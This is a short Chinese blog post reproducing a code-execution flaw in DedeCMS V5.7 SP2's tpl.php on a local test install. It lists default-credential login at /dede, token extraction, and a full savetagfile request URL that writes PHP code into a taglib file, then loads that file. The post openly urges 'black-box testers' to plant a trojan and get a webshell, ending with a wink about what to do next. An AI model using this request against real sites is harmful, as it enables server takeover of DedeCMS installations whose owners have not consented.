登陆 注册

织梦cms漏洞

Admin 2020-03-09 37人围观 ,发现0个评论 dedecms织梦远程代码


 蚁人博客带来一个织梦cms的代码执行漏洞,给大家复现下。



       分享是一种美德~


文章开始,由于一时半会找不到一个合适的站,


本菜菜就本地搭建了个织梦的站点给大家测试看看。


织梦cms漏洞 Web安全 第1张


然后大家都懂的,域名后面加上个/dede然后默认帐号密码admin登录


织梦cms漏洞 Web安全 第2张


DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞


黑盒测试的小黑们可以利用这个漏洞在增加新的标签中上传木马 获取Webshell


我们先获取token访问/dede/tpl.php?action=upload


在该页面中查看源代码获取到token值


织梦cms漏洞 Web安全 第3张


第二步访问


http://127.0.0.1/dede/tpl.php?filename=ichunqiu.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=【这里是你的token值】


织梦cms漏洞 Web安全 第4张


然后访问 /include/taglib/ichunqiu.lib.php读取得到phpinfo


织梦cms漏洞 Web安全 第5张


接下来大家应该都知道该干嘛了吧


织梦cms漏洞 Web安全 第6张


溜了 溜了


请发表您的评论
蚁人QQ二维码
蚁人QQ二维码
不容错过
Powered By 蚁人博客